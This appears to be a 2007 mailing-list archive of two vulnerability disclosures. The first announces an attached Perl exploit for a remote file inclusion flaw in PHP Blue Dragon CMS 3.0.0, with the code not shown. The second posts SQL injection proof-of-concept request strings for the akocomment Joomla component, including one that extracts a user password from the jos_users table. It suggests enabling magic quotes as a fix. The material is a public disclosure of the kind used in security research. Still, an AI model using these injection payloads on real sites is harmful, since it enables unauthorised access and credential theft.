PHP Blue Dragon CMS 3.0.0 Remote File Inclusion Vulnerability (0dd exploit)

2007-08-14 Thread Emanuele Gentili
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Exploit is attached.

E.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFGwRXDmErIuzAYjw8RApkJAKCkxFrH2XmwTS37D0B8BmaFe47EkwCgs5Uc
6XtVfkHyqOVv51uylzwT3WQ=
=49Nv
-END PGP SIGNATURE-



egs-fuckphpbluedragon300.pl
Description: Perl program


akocomment SQL INJECTION (all version)

2007-07-02 Thread Emanuele Gentili
$query2 = "INSERT INTO #__akocomment SET parentid='$acparentid',
contentid='$contentid', ip='$ip', name='$acname', title='$title',
comment='$comment', date='$date', published='$ac_autopublish';";

there are two SQL injection.


POC:



acparentid=633 e acitemid=9

option=com_akocomment&acitemid=9&acparentid=&contentid=633&func=entry&acname=Visitatore&title=aa&comment=af&hid_security_word=db17bc578c383f5bb0cb9be70c42331c&security_word=dsq

option=com_akocomment&hid_security_word=db17bc578c383f5bb0cb9be70c42331c&security_word=dsq&acitemid=9&acparentid=633',contentid=9,ip='127.0.0.1',name='test',title='titolo',comment='commento',date=0,published=1/*


option=com_akocomment&hid_security_word=db17bc578c383f5bb0cb9be70c42331c&security_word=dsq&acitemid=9&acparentid=633',contentid=9,ip='127.0.0.1',name=(select
top 1 password from
jos_users),title='titulo',comment='commento',date=0,published=1/*



it work only for magic quotes are off.


alpha fix: enable magic quotes.